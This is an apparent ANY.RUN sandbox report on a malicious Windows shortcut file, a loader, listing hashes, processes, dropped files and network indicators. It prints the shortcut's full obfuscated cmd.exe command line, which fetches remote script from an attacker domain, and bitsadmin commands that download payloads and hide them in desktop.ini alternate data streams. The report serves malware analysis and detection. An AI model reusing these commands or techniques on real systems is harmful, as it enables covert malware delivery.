analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Download_Concluido.lnk

Full analysis: https://app.any.run/tasks/3cdcf6cd-3512-4e7d-94a2-8957afba9a28
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: October 14, 2019, 16:13:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=16, Archive, ctime=Tue Jul 16 21:12:16 2019, mtime=Tue Jul 16 21:12:16 2019, atime=Tue Jul 16 21:12:16 2019, length=236032, window=hidenormalshowminimized
MD5:

BC5101705E9BBE3A586C8CAD39F80D24

SHA1:

B4A6DAC03431FFB1B6DEEE71C3DCB9389D0A7792

SHA256:

73D68EA654A544CBC1DDBB02BFE0612D1EBBF24C5CB59CD15D7684D5E799B168

SSDEEP:

24:8XKoJ64w10uaOAGuYiqXI1XZGLvx7rf8S28qv+RrgexipXuyNv4o0c5vZ4Od2SdF:8s4pDUvx7rf/28qqiraoDx4OHva48

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 2136)

    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 2136)

  • SUSPICIOUS

    • Executed via COM

      • explorer.exe (PID: 4040)

    • Executes scripts

      • explorer.exe (PID: 4040)

    • Application launched itself

      • cmd.exe (PID: 2916)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2916)
      • WScript.exe (PID: 2136)

    • Adds / modifies Windows certificates

      • WScript.exe (PID: 2136)

    • Creates files in the user directory

      • WScript.exe (PID: 2136)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString
FileAttributes: Archive
CreateDate: 2019:07:17 00:12:16+02:00
AccessDate: 2019:07:17 00:12:16+02:00
ModifyDate: 2019:07:17 00:12:16+02:00
TargetFileSize: 236032
IconIndex: 16
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: nuyf
CommandLineArguments: /V /D /c "sEt DLL=%wMUARindMUARir%MUAR\eXMUARPLoMUARReRMUAR /cMUAR,&&SeT BXD=GeBJABtOBJABbjeBJABct(BJAB'scBJABriBJABptBJAB:hBJABttpBJABs:&&SEt dIixe4j=HLGHLG7lpncg4qnm8khb7p.02ee950efa7e48.onlineHLG?08HLG') 2>&1 && sET/^p ESxvd7i="%BXD:BJAB=%%dIixe4j:HLG=/%" <nul > %Tmp%\66dJmr4.Js 2>&1 2>&1|CAll %DLL:MUAR=% %TMP%\66dJmr4.jS 2>&1|e^xi^T"
IconFileName: %SystemRoot%\system32\SHELL32.dll
MachineID: ideia_vmxx
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
69
Monitored processes
20
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs explorer.exe no specs wscript.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Windows\System32\cmd.exe" /V /D /c "sEt DLL=%wMUARindMUARir%MUAR\eXMUARPLoMUARReRMUAR /cMUAR,&&SeT BXD=GeBJABtOBJABbjeBJABct(BJAB'scBJABriBJABptBJAB:hBJABttpBJABs:&&SEt dIixe4j=HLGHLG7lpncg4qnm8khb7p.02ee950efa7e48.onlineHLG?08HLG') 2>&1 && sET/^p ESxvd7i="%BXD:BJAB=%%dIixe4j:HLG=/%" <nul > C:\Users\admin\AppData\Local\Temp\66dJmr4.Js 2>&1 2>&1|CAll %DLL:MUAR=% C:\Users\admin\AppData\Local\Temp\66dJmr4.jS 2>&1|e^xi^T"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3972C:\Windows\system32\cmd.exe /S /D /c" sET/p ESxvd7i="%BXD:BJAB=%%dIixe4j:HLG=/%" 0<nul 1>C:\Users\admin\AppData\Local\Temp\66dJmr4.Js 2>&1"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
492C:\Windows\system32\cmd.exe /S /D /c" CAll %DLL:MUAR=% C:\Users\admin\AppData\Local\Temp\66dJmr4.jS 2>&1"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1012C:\Windows\system32\cmd.exe /S /D /c" exiT"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1252C:\Windows\eXPLoReR /c, C:\Users\admin\AppData\Local\Temp\66dJmr4.jS C:\Windows\explorer.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4040C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\explorer.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2136"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\66dJmr4.Js" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
3860"C:\Windows\System32\bitsadmin.exe" /transfer 43217 /priority foreground https://obeisantsponge.cf/08/landoqeahjkya.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkya.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2208"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3400"C:\Windows\System32\bitsadmin.exe" /transfer 28102 /priority foreground https://obeisantsponge.cf/08/landoqeahjkyb.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkyb.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
323
Read events
278
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2416cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpgbinary
MD5:1CE2E6D18AE3BEB8AB578D8861E4973D
SHA256:A1AFDCDCED90094BF3E9BB25FCB37396B62D92BEA449CE62F347AC46713D3A62
2136WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\7lpncg4qnm8khb7p_02ee950efa7e48_online[1].txtxml
MD5:0819DA3405963AFA8B2ACB21AECD47FF
SHA256:BA9EC92F42C51E86308EED46EC6A345D3AABE68625E5E7110F3BCB231CC457BF
2208cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpgbinary
MD5:57BBFB7DFBD710AAEF209BFF71B08A32
SHA256:66C9C650E26635BF9E205E0EBB7B149A69A25F002917A1F9C5360149D423B30E
3500cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydx.gifbinary
MD5:34D213AA475C1BD5073CA1E211FA004D
SHA256:1298B141E7478545D5F177386C2B714159ADD3AD53169C93A0CB5BCAD5D31A7D
2440cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyb.jpgbinary
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D
SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC
3924cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydwwn.gifbinary
MD5:BD8D1F667C851829529D94BC36435F02
SHA256:5A7BDC3A85B3563F1D902FE93E1207F5BA9F01D69660036DF552F0997B537CEF
1552cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyg.gifbinary
MD5:3FAF92C3AAF9C9DB18C523E6CBF9FB69
SHA256:7684F7262A0952B68DE36AD1000ED2819707AD18D3F4591E9192A4D5997F4699
3972cmd.exeC:\Users\admin\AppData\Local\Temp\66dJmr4.Jstext
MD5:464297C4770F78243279E8D00B11783C
SHA256:B925B5669B09F359650F779C1C20DDD8A40C4B17F9FC9C6A1E37C112A9099C71
2136WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@02ee950efa7e48[1].txttext
MD5:007932287421148C6053BCC7605135F7
SHA256:24D8C23E823DCD7B75B85351C5FF8EB0A0A94050CFD90AC7CCFC78F429811F44
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2136
WScript.exe
104.24.126.167:443
7lpncg4qnm8khb7p.02ee950efa7e48.online
Cloudflare Inc
US
unknown
104.27.147.123:443
obeisantsponge.cf
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
7lpncg4qnm8khb7p.02ee950efa7e48.online
  • 104.24.126.167
  • 104.24.127.167
suspicious
obeisantsponge.cf
  • 104.27.147.123
  • 104.27.146.123
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .cf Domain
Potentially Bad Traffic
ET INFO Suspicious Domain (*.cf) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Download_Concluido.lnk